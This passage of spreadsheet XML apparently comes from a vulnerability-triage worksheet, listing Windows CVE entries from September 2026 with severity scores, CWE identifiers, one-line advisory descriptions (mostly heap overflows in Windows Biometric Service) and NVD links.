          <t>CVE-2026-72990</t>
        </is>
      </c>
      <c r="D925" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E925" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F925" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G925" s="5" t="inlineStr"/>
      <c r="H925" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I925" s="5" t="inlineStr"/>
      <c r="J925" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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5" s="5" t="inlineStr"/>
      <c r="M925" s="5" t="inlineStr"/>
      <c r="N925" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O925" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P925" s="5" t="inlineStr"/>
      <c r="Q925" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R925" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B926" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72991</t>
        </is>
      </c>
      <c r="D926" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E926" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F926" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G926" s="5" t="inlineStr"/>
      <c r="H926" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I926" s="5" t="inlineStr"/>
      <c r="J926" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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6" s="5" t="inlineStr"/>
      <c r="M926" s="5" t="inlineStr"/>
      <c r="N926" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O926" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P926" s="5" t="inlineStr"/>
      <c r="Q926" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R926" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B927" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72992</t>
        </is>
      </c>
      <c r="D927" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E927" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F927" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G927" s="5" t="inlineStr"/>
      <c r="H927" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I927" s="5" t="inlineStr"/>
      <c r="J927" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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7" s="5" t="inlineStr"/>
      <c r="M927" s="5" t="inlineStr"/>
      <c r="N927" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O927" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P927" s="5" t="inlineStr"/>
      <c r="Q927" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R927" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B928" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72993</t>
        </is>
      </c>
      <c r="D928" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E928" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F928" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G928" s="5" t="inlineStr"/>
      <c r="H928" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I928" s="5" t="inlineStr"/>
      <c r="J928" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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8" s="5" t="inlineStr"/>
      <c r="M928" s="5" t="inlineStr"/>
      <c r="N928" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O928" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P928" s="5" t="inlineStr"/>
      <c r="Q928" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R928" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B929" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72994</t>
        </is>
      </c>
      <c r="D929" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E929" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F929" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G929" s="5" t="inlineStr"/>
      <c r="H929" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I929" s="5" t="inlineStr"/>
      <c r="J929" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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29" s="5" t="inlineStr"/>
      <c r="M929" s="5" t="inlineStr"/>
      <c r="N929" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O929" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P929" s="5" t="inlineStr"/>
      <c r="Q929" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R929" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B930" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72995</t>
        </is>
      </c>
      <c r="D930" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E930" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F930" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G930" s="5" t="inlineStr"/>
      <c r="H930" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I930" s="5" t="inlineStr"/>
      <c r="J930" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K93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0" s="5" t="inlineStr"/>
      <c r="M930" s="5" t="inlineStr"/>
      <c r="N930" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O930" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P930" s="5" t="inlineStr"/>
      <c r="Q930" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R930" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B931" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72996</t>
        </is>
      </c>
      <c r="D931" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E931" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F931" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G931" s="5" t="inlineStr"/>
      <c r="H931" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I931" s="5" t="inlineStr"/>
      <c r="J931" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K93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1" s="5" t="inlineStr"/>
      <c r="M931" s="5" t="inlineStr"/>
      <c r="N931" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O931" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P931" s="5" t="inlineStr"/>
      <c r="Q931" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R931" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B932" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72997</t>
        </is>
      </c>
      <c r="D932" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E932" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F932" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G932" s="5" t="inlineStr"/>
      <c r="H932" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I932" s="5" t="inlineStr"/>
      <c r="J932" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K93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2" s="5" t="inlineStr"/>
      <c r="M932" s="5" t="inlineStr"/>
      <c r="N932" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O932" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P932" s="5" t="inlineStr"/>
      <c r="Q932" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R932" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B933" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73000</t>
        </is>
      </c>
      <c r="D933" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E933" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F933" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G933" s="5" t="inlineStr"/>
      <c r="H933" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I933" s="5" t="inlineStr"/>
      <c r="J933" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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3" s="5" t="inlineStr"/>
      <c r="M933" s="5" t="inlineStr"/>
      <c r="N933" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O933" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P933" s="5" t="inlineStr"/>
      <c r="Q933" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R933" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B934" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73001</t>
        </is>
      </c>
      <c r="D934" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E934" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F934" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G934" s="5" t="inlineStr"/>
      <c r="H934" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I934" s="5" t="inlineStr"/>
      <c r="J934" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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4" s="5" t="inlineStr"/>
      <c r="M934" s="5" t="inlineStr"/>
      <c r="N934" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O934" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P934" s="5" t="inlineStr"/>
      <c r="Q934" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R934" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B935" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73002</t>
        </is>
      </c>
      <c r="D935" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E935" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F935" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G935" s="5" t="inlineStr"/>
      <c r="H935" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I935" s="5" t="inlineStr"/>
      <c r="J935" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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5" s="5" t="inlineStr"/>
      <c r="M935" s="5" t="inlineStr"/>
      <c r="N935" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O935" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P935" s="5" t="inlineStr"/>
      <c r="Q935" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R935" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t>
        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B936" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73007</t>
        </is>
      </c>
      <c r="D936" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E936" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F936" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G936" s="5" t="inlineStr"/>
      <c r="H936" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I936" s="5" t="inlineStr"/>
      <c r="J936" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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6" s="5" t="inlineStr"/>
      <c r="M936" s="5" t="inlineStr"/>
      <c r="N936" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O936" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P936" s="5" t="inlineStr"/>
      <c r="Q936" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R936" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B937" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73011</t>
        </is>
      </c>
      <c r="D937" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E937" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F937" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G937" s="5" t="inlineStr"/>
      <c r="H937" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I937" s="5" t="inlineStr"/>
      <c r="J937" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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7" s="5" t="inlineStr"/>
      <c r="M937" s="5" t="inlineStr"/>
      <c r="N937" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O937" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P937" s="5" t="inlineStr"/>
      <c r="Q937" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R937" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B938" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73014</t>
        </is>
      </c>
      <c r="D938" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E938" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F938" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G938" s="5" t="inlineStr"/>
      <c r="H938" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I938" s="5" t="inlineStr"/>
      <c r="J938" s="5" t="inlineStr"/>
      <c r="K938" s="5" t="inlineStr"/>
      <c r="L938" s="5" t="inlineStr"/>
      <c r="M938" s="5" t="inlineStr"/>
      <c r="N938" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O938" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P938" s="5" t="inlineStr"/>
      <c r="Q938" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R938" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Data Sharing Service Client allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73014</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B939" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73015</t>
        </is>
      </c>
      <c r="D939" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E939" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F939" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G939" s="5" t="inlineStr"/>
      <c r="H939" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I939" s="5" t="inlineStr"/>
      <c r="J939" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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39" s="5" t="inlineStr"/>
      <c r="M939" s="5" t="inlineStr"/>
      <c r="N939" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O939" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P939" s="5" t="inlineStr"/>
      <c r="Q939" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R939" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B940" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73020</t>
        </is>
      </c>
      <c r="D940" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E940" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F940" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G940" s="5" t="inlineStr"/>
      <c r="H940" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I940" s="5" t="inlineStr"/>
      <c r="J940" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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40" s="5" t="inlineStr"/>
      <c r="M940" s="5" t="inlineStr"/>
      <c r="N940" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O940" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P940" s="5" t="inlineStr"/>
      <c r="Q940" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R940" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B941" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73021</t>
        </is>
      </c>
      <c r="D941" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E941" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F941" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G941" s="5" t="inlineStr"/>
      <c r="H941" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I941" s="5" t="inlineStr"/>
      <c r="J941" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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41" s="5" t="inlineStr"/>
      <c r="M941" s="5" t="inlineStr"/>
      <c r="N941" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O941" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P941" s="5" t="inlineStr"/>
      <c r="Q941" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R941" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B942" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73024</t>
        </is>
      </c>
      <c r="D942" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E942" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F942" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G942" s="5" t="inlineStr"/>
      <c r="H942" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I942" s="5" t="inlineStr"/>
      <c r="J942" s="5" t="inlineStr"/>
      <c r="K942" s="5" t="inlineStr"/>
      <c r="L942" s="5" t="inlineStr"/>
      <c r="M942" s="5" t="inlineStr"/>
      <c r="N942" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O942" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P942" s="5" t="inlineStr"/>
      <c r="Q942" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R942" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73024</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B943" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73026</t>
        </is>
      </c>
      <c r="D943" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E943" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F943" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G943" s="5" t="inlineStr"/>
      <c r="H943" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I943" s="5" t="inlineStr"/>
      <c r="J943" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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43" s="5" t="inlineStr"/>
      <c r="M943" s="5" t="inlineStr"/>
      <c r="N943" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O943" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P943" s="5" t="inlineStr"/>
      <c r="Q943" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R943" s="5" t="inlineStr">
        <is>
